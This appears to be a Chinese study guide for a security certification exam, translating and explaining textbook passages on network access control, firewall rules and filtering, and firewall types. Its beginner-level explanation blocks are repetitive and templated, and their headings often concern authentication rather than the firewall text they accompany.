系统级芯片(SoC) 一个 系统级芯片(SoC) 是一种将计算机的所有元件集成到单个芯片上的 集成电路(IC)。 这通常包括主 CPU、RAM、GPU、Wi‑Fi、有线网络、 外设接口(如 USB)和电源管理。 在大多数情况下,与完整计算机相比, SoC 唯一缺少的是大容量存储。 通常,必须将大容量存储设备连接到 SoC 以存储其程序和其他文件,因为 SoC 通常仅包含足以保留其固件或操作系 统的内存。 SoC的安全风险包括其固件或操作系统通常非常精简,这使得大多数安全功 能难以实现。 SoC可能能够过滤输入(例如通过长度限制或转义元字符)、 拒绝未签名的代码、提供基本的防火墙过滤、使用通信加密以及提供安全 认证。 然而,这些功能并非在所有SoC产品中都普遍可用。 使用SoC的一些 设备包括迷你计算机Raspberry Pi、健身追踪器、智能手表和部分智能手 机。 网络访问控制 网络访问控制(NAC)是一种通过严格遵守和执行安全策略来控制对环境访问 的概念。 NAC旨在成为一个自动化检测与响应系统,能够实时反应,以确保所 有被监控的系统都及时更新补丁和版本,并符合最新的安全配置,同时阻止未 经授权的设备接入网络。

NAC的目标如下: 直接预防/减少已知攻击,间接应对零日攻击 在整个网络中强制执行安全策略 使用身份执行访问控制 通过使用强大的、详细的安全策略,定义从客户端到服务器的每个设备以及所 有内部或外部通信的安全控制、过滤、预防、检测和响应的各个方面,即可实 现NAC的目标。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
身份 身份是主体在系统中的标识。
学习单元 79 / PDF P797

授权、审计与问责

认证后还要授权,之后靠审计和日志追责。

教材原文段落

Originally, 802.1X (which provides port-based NAC) was thought to embody NAC, but most supporters believe that 802.1X is only a simple form of NAC or just one optional component in a complete NAC solution. NAC can be implemented with a preadmission philosophy or a postadmission philosophy, or aspects of both: The preadmission philosophy requires a system to meet all current security requirements (such as patch application and malware scanner updates) before it is allowed to communicate with the network. The postadmission philosophy allows and denies access based on user activity, which is based on a predefined authorization matrix.

NAC options include using a host/system agent (agent-based) or performing overall network monitoring and assessment (agentless). A typical operation of an agent-based NAC system would be to install a NAC monitoring agent on each managed system. The NAC agent retrieves a configuration file on a regular basis, possibly daily or upon network connection, to check the current configuration baseline requirements against the local system. If the system is not compliant, it can be quarantined into a remediation subnet where it can communicate only with the NAC server. The NAC agent can download and apply updates and configuration files to bring the system into compliance.

Once compliance is achieved, the NAC agent returns the system to the normal production network. NAC agents can be either dissolvable or permanent. A dissolvable NAC agent is usually written in a web/mobile language and is downloaded and executed to each local machine when the specific management web page is accessed (such as a captive portal). A dissolvable NAC agent can be set to run once and then terminate. A permanent NAC agent is installed onto the monitored system as a persistent software background service.

An agentless or network monitoring and assessment NAC solution performs port scans, service queries, and vulnerability scans against networked systems from the NAC server to determine whether devices are authorized and baseline compliant. An agentless system requires an administrator to manually resolve any discovered issues. NAC systems can be implemented using both physical and virtual solutions. Physical NAC appliances are dedicated hardware devices that are deployed at key points in the network infrastructure. These devices actively monitor and

中文直译 / 整理

最初,802.1X(提供基于端口的NAC)被认为体现了NAC,但大多数支持者认 为,802.1X只是NAC的一种简单形式,或只是完整NAC解决方案中的一个可选组件。 NAC 可以采用准入前理念或准入后理念 理念,或两者的结合: 准入前理念要求系统在允许与网络通信之前,必须满足所有当前的安全 要求(例如打补丁和恶意软件扫描程序更新)。 准入后理念根据用户活动允许或拒绝访问,而用户活动基于预定义的授权 矩阵。 NAC 选项包括使用主机/系统代理(基于代理)或执行整体网络监控与评估 (无代理)。 典型的基于代理的 NAC 系统操作是在每个受管系统上安装一个 NAC 监控代理。 NAC 代理会定期获取配置文件,可能每天或在连接网络时获 取,以将当前配置基线要求与本地系统进行比对。 如果系统不符合要求,它将 被隔离到一个修复子网中,此时只能与 NAC 服务器通信。 NAC 代理可以下载 并应用更新和配置文件,使系统符合要求。 一旦达到合规性,NAC 代理便将系 统返回到正常的生产网络。 NAC代理可以是可删除的或永久的。

可删除的NAC代理通常使用Web/移动语 言编写,当访问特定管理网页时(例如捕获门户),会被下载并执行到每台本 地机器上。 可删除的NAC代理可以设置为运行一次后即终止。 永久性NAC代理 则作为持久的后台服务安装在被监控的系统上。 无代理或网络监控与评估NAC解决方案从NAC服务器对联网系统执行端口扫 描、服务查询和漏洞扫描,以确定设备是否获得授权并符合基线要求。 无代理 系统需要管理员手动解决发现的任何问题。 NAC 系统可以使用物理和虚拟解决方案实现。 物理 NAC 设备是部署在网络 基础设施关键点的专用硬件设备。 这些设备主动监控和

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证后还要授权,之后靠审计和日志追责。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“授权、审计与问责”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

扫描发现弱点,不等于已经成功利用。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
漏洞扫描 漏洞扫描用工具找已知弱点。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 80 / PDF P798

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

control network access based on established policies. Virtual NAC solutions are software-based implementations that can run on virtual machines or as part of existing network infrastructure. They provide flexibility and scalability, allowing organizations to deploy NAC capabilities without dedicated hardware. Other issues around NAC include out-of-band versus in-band monitoring, as well as resolving any remediation, quarantine, or captive portal strategies. You should evaluate these and other NAC concerns before implementation. Firewalls Firewalls are essential tools in managing, controlling, and filtering network traffic.

A firewall can be a hardware or software component designed to protect one network segment from another. Firewalls are deployed between areas of higher and lower trust, like a private network and a public network (such as the Internet), or between two network segments that have different security levels/domains/classifications. Many commercial firewalls are hardware-based and can be called hardware firewalls, appliance firewalls, or network firewalls. A virtual firewall is a firewall created for use in a virtualized or hypervisor environment or the cloud. A virtual firewall is a software recreation of an appliance firewall or a standard host-based firewall installed into a guest OS in a VM.

Firewalls filter traffic based on a defined set of rules, also called filters or access control lists. They are basically a set of instructions that are used to distinguish authorized traffic from unauthorized and/or malicious traffic. Only authorized traffic is allowed to cross the security barrier provided by the firewall. A typical firewall is based on the deny-by-default or implicit deny security stance. Only communications that meet an explicit allow exception are transmitted toward their destination. This concept is also known as allow listing. The typical actions of a filter rule are allow, deny, drop, alert, and/or log. Some firewalls use a first-match mechanism when applying rules.

Allow rules enable the packet to continue toward its destination. Deny rules block the packet from going any further (effectively discarding it). When first-match is

中文直译 / 整理

根据既定策略控制网络访问。 虚拟 NAC 解决方案是基于软件的实现,可以 在虚拟机上运行或作为现有网络基础设施的一部分。 它们提供灵活性和可扩 展性,使组织能够在无需专用硬件的情况下部署 NAC 功能。 与NAC相关的其他问题包括带外监控与带内监控,以及解决任何补救、隔离 或强制门户策略。 您应在实施前评估这些及其他NAC相关问题。 防火墙 防火墙是管理、控制和过滤网络流量的重要工具。 防火墙可以是硬件或软件组 件,旨在保护一个网络段免受另一个网络段的侵害。 防火墙部署在信任级别不 同区域之间,例如私有网络与公共网络(如互联网),或两个具有不同安全级 别/域/分类的网络段之间。 许多商业防火墙是基于硬件的,可称为硬件防火墙、 设备防火墙或网络防火墙。 虚拟防火墙是为在虚拟化或虚拟机监控程序环境或云环境中使用而创 建的防火墙。 虚拟防火墙是对设备防火墙或安装在虚拟机中客户操作系统 里的标准主机防火墙的软件重现。 防火墙根据一组预定义的规则过滤流量,这些规则也称为过滤器或访问控制列 表。 它们本质上是一组用于区分授权流量与未经授权和/或恶意流量的指令。 只 有授权流量才被允许通过防火墙提供的安全屏障。

典型的防火墙基于默认拒绝 或隐式拒绝的安全策略。 只有满足显式允许例外的通信才会被传输到其目的地。 此概念也称为白名单。 过滤规则的典型操作包括允许、拒绝、丢弃、告警和/或记录。 一些防火墙在应 用规则时采用首次匹配机制。 允许规则使数据包能够继续向其目的地传输。 拒 绝规则阻止数据包进一步前进(实际上将其丢弃)。 当采用首次匹配时

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

ISO 偏标准和管理体系。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 81 / PDF P799

第 799 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

used, the first rule that applies to the packet is followed, but no other rules are considered. Thus, rules need to be placed in a priority order. A final rule is the deny-all rule so that nothing is allowed to traverse the firewall unless it is granted an explicit exception. However, some firewalls perform a consolidated or accumulated result of all the rules that match a packet. Such amalgamation firewalls do not have a written or specific deny-all rule— instead they use implicit deny. This method also ensures that only traffic meeting explicit allow rules (which is not explicitly denied) is allowed to pass. Sometimes a firewall's rule set is referred to by the term tuple.

Tuple is a mathematical term meaning a collection of related data items. Tuple is also used with databases, where it references a record or row in a table. Firewalls are most effective against unrequested traffic, initiations from outside the private network, and known malicious data, messages, or packets based on content, application, protocol, port, or source address. Most firewalls offer extensive logging, auditing, and monitoring capabilities as well as alarms and basic IDS functions. A bastion host is a system specifically designed to withstand attacks, such as a firewall appliance or a jump server. The word bastion comes from medieval castle architecture.

A bastion guardhouse was positioned in front of the main entrance (typically on the other side of the moat from the castle, where it controlled entrance onto the drawbridge) to serve as a first layer of protection. Using this term to describe a host indicates that the system is acting as a sacrificial host that will receive all inbound attacks. Common ingress filters and egress filters can be used to block spoofed packets that often relate to malware, botnets, and other unwanted activities. Examples include the following: Blocking inbound packets claiming to have an internal source address Blocking outbound packets claiming to have an external source address

中文直译 / 整理

时,第一个匹配数据包的规则将被执行,但不会考虑其他规则。 因此,规则需 要按优先级顺序排列。 最终规则是拒绝所有规则,以确保除非有明确的例外, 否则没有任何流量能够通过防火墙。 然而,一些防火墙会对与数据包匹配的所 有规则进行综合或累积评估。 这类综合型防火墙没有明确或特定的拒绝所有规 则——而是使用隐式拒绝。 这种方法同样确保只有符合明确允许规则(且未被 明确拒绝)的流量才被允许通过。 有时,防火墙的规则集被称为tuple。 Tuple 是一个数学术语,指一组 相关数据项。 Tuple 也用于数据库中,表示表中的一条记录或一行。 防火墙在应对未请求的流量、来自私有网络外部的连接发起,以及基于内容、 应用程序、协议、端口或源地址的已知恶意数据、消息或数据包时最为有效。 大多数防火墙还提供广泛的日志记录、审计和监控功能,以及警报和基本的入 侵检测系统(IDS)功能。 一个bastion host是专门设计用于抵御攻击的系统,例如防火墙设备或 跳板服务器。 词bastion源自中世纪城堡建筑。 堡垒岗亭通常位于主入口前 方(通常在护城河的另一侧,控制着进入吊桥的通道),作为第一道防线。

使用该术语来描述主机,表明该系统充当了牺牲主机,将接收所有入站攻 击。 常见的入站过滤器和出站过滤器可用于阻止与恶意软件、僵尸网络和其他不 希望的活动相关的伪造数据包。 示例如下: 阻止声称具有内部源地址的入站数据包 阻止声称具有外部源地址的出站数据包

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

防火墙:防火墙根据规则控制网络流量进出。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 799 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

检测是 IDS,主动阻断更像 IPS。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
防火墙 防火墙根据规则控制网络流量进出。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 82 / PDF P800

第 800 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Blocking packets with source or destination addresses listed on a block list (a list of known malicious IP addresses) Blocking packets that have source or destination addresses from the local area network (LAN) but that haven't been officially assigned to a host Remotely triggered black hole (RTBH) is an edge filtering concept to discard unwanted traffic based on source or destination address long before it reaches the destination.

Firewalls, on their own, are typically unable to directly block viruses or malicious code transmitted through otherwise authorized communication channels, prevent unauthorized but accidental or intended disclosure of information by users, prevent attacks by malicious users already behind the firewall, or protect data after it passes out of or into the private network. However, you can add these features through special add-in modules or companion products, such as antimalware scanners, DLP, and IDS tools. Firewall appliances are available that are preconfigured to perform all (or most) of these add-on functions natively.

These types of firewall can be called a multifunction device (MFD), a unified threat management (UTM) device, or a next-generation firewall (NGFW). In addition to logging network traffic activity, firewalls should log several other events: A reboot of the firewall Proxies or dependencies unable to start or not starting Proxies or other important services crashing or restarting Changes to the firewall configuration file A configuration or system error while the firewall is running Firewalls are only one part of an overall security solution. With a firewall, many of the security mechanisms are concentrated in one place, and thus a firewall can be a single point of failure.

Firewall failure is most commonly caused by human error and misconfiguration. Firewalls provide protection only against traffic that crosses the firewall.

中文直译 / 整理

阻止源地址或目的地址列在阻断列表(已知恶意IP地址列表)上的数据包 阻止源地址或目的地址来自本地 局域网(LAN)但未被正式分配给任何主机的数据包 远程触发的黑洞(RTBH)是一种边缘过滤概念,可在数据包到 达目的地之前很久,根据源地址或目的地址丢弃不需要的流量。 仅靠防火墙通常无法直接阻止通过其他授权通信通道传输的病毒或恶意代码, 无法防止用户无意或有意的未经授权信息泄露,无法阻止已位于防火墙后的恶 意用户发起的攻击,也无法在数据进出私有网络后保护数据。 然而,您可以通 过专用附加模块或配套产品(如反恶意软件扫描器、DLP和IDS工具)添加这些 功能。 市面上有预配置好以原生方式执行所有(或大部分)这些附加功能的防 火墙设备。 这类防火墙可称为多功能设备(MFD)、统一威胁管理(UTM)设 备或下一代防火墙(NGFW)。 除了记录网络流量活动外,防火墙还应记录以下其他事件: 防火墙的重启 代理或依赖项无法启动或未启动 代理或其他重要服务崩溃或重启 防火墙配置文件的更改 防火墙运行时的配置或系统错误 防火墙只是整体安全解决方案的一部分。 使用防火墙时,许多安全机制都集 中在一处,因此防火墙可能成为单点故障。

防火墙故障最常见的原因是人为 错误和配置不当。 防火墙仅对穿越防火墙的流量提供保护。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

防火墙:防火墙根据规则控制网络流量进出。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 800 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

检测是 IDS,主动阻断更像 IPS。

日志要保护完整性、时间同步和访问控制。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
防火墙 防火墙根据规则控制网络流量进出。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 83 / PDF P801

第 801 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

There are several basic types of firewalls, which can be mixed to create hybrid or complex firewall solutions: Static Packet-Filtering Firewalls A static packet-filtering firewall (aka screening router) filters traffic by examining data from a message header. Usually, the rules are concerned with source and destination IP address (Layer 3) and port numbers (Layer 4). This is also a type of stateless firewall since each packet is evaluated individually rather than in context (which is performed by a stateful firewall). A stateless firewall analyzes packets on an individual basis against the filtering access control lists (ACLs) or rules.

The context of the communication (that is, any previous packets) is not used to make an allow or deny decision on the current packet. Application-Level Firewalls An application-level firewall filters traffic based on a single internet service, protocol, or application. Application-level firewalls operate at the Application Layer (Layer 7) of the OSI model. An example is the web application firewall (WAF). This firewall may be implemented stateless or stateful.

中文直译 / 整理

防火墙有几种基本类型,可以混合使用以创建混合或复杂的防火墙解决方案: 静态包过滤防火墙是一种静态包过滤防火墙(又称筛选路由器),通过检查消 息头部的数据来过滤流量。 通常,规则涉及源和目的IP地址(第3层)和端口 号(第4层)。 这也是一种无状态防火墙,因为每个数据包都是单独评估的, 而不是在上下文中评估(有状态防火墙会进行上下文评估)。 一种无状态防火墙根据过滤访问控制列表(ACL)或规则对数据包进 行逐个分析。 在决定允许或拒绝当前数据包时,不会使用通信的上下文 (即任何先前的数据包)。 应用层防火墙一个应用层防火墙根据单个互联网服务、协议或应用程序过滤 流量。 应用层防火墙在OSI模型的应用层(第7层)运行。 一个例子是Web应 用防火墙(WAF)。 这种防火墙可以实现为无状态或有状态的。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

防火墙:防火墙根据规则控制网络流量进出。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 801 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
防火墙 防火墙根据规则控制网络流量进出。
学习单元 84 / PDF P802

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

A web application firewall (WAF) is an appliance, server addon, virtual service, or system filter that defines a strict set of communication rules for communications to and from a website. It's intended to prevent web application attacks. A next-generation secure web gateway (SWG, NGSWG, NG-SWG) is a variation of and combination of the ideas of an NGFW and a WAF. An SWG is a cloud-based web gateway solution that is often tied to a subscription service that provides ongoing updates to filters and detection databases. This cloud-based firewall is designed to provide filtering services between CSP-based resources and on-premises systems.

An SWG/NG-SWG often supports standard WAF functions; TLS decryption; cloud access security broker (CASB) functions; advanced threat protection (ATP), such as sandboxing and ML-based threat detection; DLP; rich metadata about traffic; and detailed logging and reporting. Circuit-Level Firewalls Circuit-level firewalls (aka circuit proxies) are used to establish communication sessions between trusted partners. In theory, they operate at the Session Layer (Layer 5) of the OSI model (although in reality, they operate in relation to the establishment of TCP sessions at the Transport Layer [Layer 4]).

SOCKS (from Socket Secure, as in TCP/IP ports) is a common implementation of a circuit-level firewall. Circuitlevel firewalls focus on the establishment of the circuit (or session), not the content of traffic, based on simple rules for IP and port, using captive portals, requiring port authentication via 802.1X, or more complex elements such as contextor attribute-based access control. This is also a type of stateless firewall. A TCP Wrapper is an application that can serve as a basic firewall by restricting access to ports and resources based on user IDs or system IDs. Using TCP Wrappers is a form of port-based access control.

Stateful Inspection Firewalls Stateful inspection firewalls (aka dynamic packet filtering firewalls) evaluate the state, session, or context of network traffic. By examining source and destination addresses, application usage,

中文直译 / 整理

一个Web应用防火墙(WAF)是一种设备、服务器附加组件、虚拟服 务或系统过滤器,它为网站的通信定义了一套严格的通信规则。 其目的是 防止Web应用程序攻击。 一种 下一代安全网关(SWG、NGSWG、NG-SWG) 是下一代防火墙( NGFW)和Web应用防火墙(WAF)理念的变体与结合。 SWG 是一种基 于云的网关解决方案,通常与提供过滤器和检测数据库持续更新的订阅服务 相关联。 这种基于云的防火墙旨在在基于云服务提供商(CSP)的资源与本 地系统之间提供过滤服务。 SWG/NG‑SWG 通常支持标准的 WAF 功能、 TLS 解密、云访问安全代理(CASB)功能、高级威胁防护(ATP),例如 沙箱和基于机器学习的威胁检测、数据防泄漏(DLP)、丰富的流量元数 据以及详细的日志和报告。 电路层防火墙电路层防火墙(又称 电路代理)用于在可信合作伙伴之间建立通 信会话。 理论上,它们在 OSI 模型的会话层(第 5 层)运行(尽管实际上,它 们与传输层 [第 4] 层的 TCP 会话建立相关)。 SOCKS(源自 Socket Secure, 即 TCP/IP 端口)是电路层防火墙的常见实现。

电路层防火墙关注的是电路 (或会话)的建立,而非流量内容,基于简单的 IP 和端口规则,通过捕获门户、 要求通过 802.1X 进行端口认证,或使用更复杂的元素如基于上下文或属性的访 问控制。 这也是一种无状态防火墙。 一个 TCP Wrapper 是一种可以通过基于用户ID或系统ID限制对端口和资源 的访问来充当基本防火墙的应用程序。 使用TCP Wrappers是一种基于端口的访 问控制形式。 有状态检查防火墙 有状态检查防火墙(又称 动态包过滤防火墙)会评估网络 流量的状态、会话或上下文。 通过检查源地址和目标地址、应用程序使用情况,

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

考试常让你把协议、端口、层次对应起来。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
TCP/IP 模型 TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。
防火墙 防火墙根据规则控制网络流量进出。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 85 / PDF P803

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

